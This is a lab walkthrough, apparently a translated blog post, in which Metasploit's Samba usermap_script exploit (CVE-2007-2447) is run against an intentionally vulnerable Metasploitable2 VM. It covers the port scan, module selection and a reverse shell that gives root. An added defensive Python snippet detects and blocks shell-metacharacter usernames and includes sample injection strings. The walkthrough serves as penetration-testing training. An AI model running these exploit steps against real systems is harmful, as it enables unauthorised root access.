Starting the Metasploit console

root@kali:~# service postgresql start
root@kali:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali:~# msfconsole
~(output omitted)~
       =[ metasploit v5.0.38-dev                          ]
+ -- --=[ 1912 exploits - 1073 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 3 evasion                                       ]

msf5 >
Check which ports are open on Metasploitable2.

msf5 > nmap -P0-65535 192.168.56.105    (← scan every port number from 0 to 65535)
[*] exec: nmap -P0-65536 192.168.56.105

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-08 00:40 JST
Nmap scan report for 192.168.56.105
Host is up (0.00045s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:79:45:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
This shows that netbios and the Microsoft directory service (microsoft-ds), which Samba uses for file sharing with Windows, are running.

JVNDB-2007-000374 - JVN iPedia - Vulnerability Countermeasure Information Database
"Command injection vulnerability in Samba"
Samba has an issue in which RPC message input from users is not properly sanitized before being passed to /bin/sh. As a result, a remote third party may be able to execute arbitrary commands.

Check whether Metasploit has an exploit for Samba.
msf5 > search samba

Matching Modules
================

   #   Name                                                    Disclosure Date  Rank       Check  Description
   -   ----                                                    ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                              normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                    normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                                  normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                                 normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                     normal     Yes    List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                    normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   exploit/freebsd/samba/trans2open                        2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   7   exploit/linux/samba/chain_reply                         2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   8   exploit/linux/samba/is_known_pipename                   2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   9   exploit/linux/samba/lsa_transnames_heap                 2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   10  exploit/linux/samba/setinfopolicy_heap                  2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  exploit/linux/samba/trans2open                          2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   12  exploit/multi/samba/nttrans                             2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                      2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                   2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   15  exploit/osx/samba/trans2open                            2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   16  exploit/solaris/samba/lsa_transnames_heap               2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/solaris/samba/trans2open                        2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   18  exploit/unix/http/quest_kace_systems_management_rce     2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   19  exploit/unix/misc/distcc_exec                           2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   20  exploit/unix/webapp/citrix_access_gateway_exec          2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   21  exploit/windows/fileformat/ms14_060_sandworm            2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   22  exploit/windows/http/sambar6_search_results             2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   23  exploit/windows/license/calicclnt_getconfig             2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   24  exploit/windows/smb/group_policy_startup                2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   25  post/linux/gather/enum_configs                                           normal     No     Linux Gather Configurations
Let's try module 13, exploit/multi/samba/usermap_script.

msf5 > info exploit/multi/samba/usermap_script

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target address range or CIDR identifier
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba
  versions 3.0.20 through 3.0.25rc3 when using the non-default
  "username map script" configuration option. By specifying a username
  containing shell meta characters, attackers can execute arbitrary
  commands. No authentication is needed to exploit this vulnerability
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html
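To make the module description concrete from the defender's side, here is an added example (not from the original post, and not Samba's or Metasploit's code) that flags usernames carrying shell metacharacters in constructed, hypothetical auth log lines, and shows the hardened shape of a map-script call: allowlist validation plus an argv exec with shell=False. The log format, the script path and the account names are all constructed for this example.

```python
import re
import subprocess

# Characters /bin/sh would interpret if a username were spliced, unquoted,
# into the "username map script" command line (the CVE-2007-2447 flaw).
SHELL_META = set(";|&`$(){}<>\\'\"\n")

# Allowlist for account names; anything else is rejected before any script runs.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Constructed sample log lines (hypothetical format, not real Samba output).
# The map script ran *before* authentication, so a LOGON_FAILURE line can
# still mean an injected command executed.
SAMPLE_LOG = """\
auth: user=[msfadmin] from=192.168.56.106 result=OK
auth: user=[alice;id] from=192.168.56.106 result=NT_STATUS_LOGON_FAILURE
auth: user=[`id`] from=192.168.56.106 result=NT_STATUS_LOGON_FAILURE
auth: user=[bob.smith] from=192.168.56.1 result=OK
"""
USER_FIELD_RE = re.compile(r"user=\[(.*)\] from=")


def shell_metachars(username):
    """Return the sorted shell metacharacters present in username ([] if clean)."""
    return sorted(c for c in set(username) if c in SHELL_META)


def find_suspicious_logins(log_text):
    """Detection: list usernames carrying shell metacharacters, the signature
    of a 'username map script' injection attempt."""
    hits = []
    for line in log_text.splitlines():
        m = USER_FIELD_RE.search(line)
        if m and shell_metachars(m.group(1)):
            hits.append(m.group(1))
    return hits


def run_map_script_safely(script_path, username, runner=subprocess.run):
    """Mitigation: the hardened shape of the map-script call. The name is
    checked against the allowlist and the script is exec'd with an argv list
    (shell=False), so the username is one argument, never shell input."""
    if not USERNAME_RE.match(username):
        raise ValueError(f"rejected username: {username!r}")
    return runner([script_path, username], shell=False,
                  capture_output=True, text=True, check=False)


if __name__ == "__main__":
    print("suspicious:", find_suspicious_logins(SAMPLE_LOG))
```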
Use the exploit and set the remote host.

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 192.168.56.105
RHOST => 192.168.56.105
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.56.106:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LobabiCRpIvAL9ia;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LobabiCRpIvAL9ia\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.106:4444 -> 192.168.56.105:57740) at 2019-09-08 00:54:53 +0900

id    (← command entered)
uid=0(root) gid=0(root)
uname -a    (← command entered)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux    (← we have a shell on Metasploitable2)
Exit.

^C    (← Ctrl + C)
Abort session 1? [y/N]  y
""
[*] 192.168.56.105 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(multi/samba/usermap_script) > back
msf5 > exit
root@kali:~#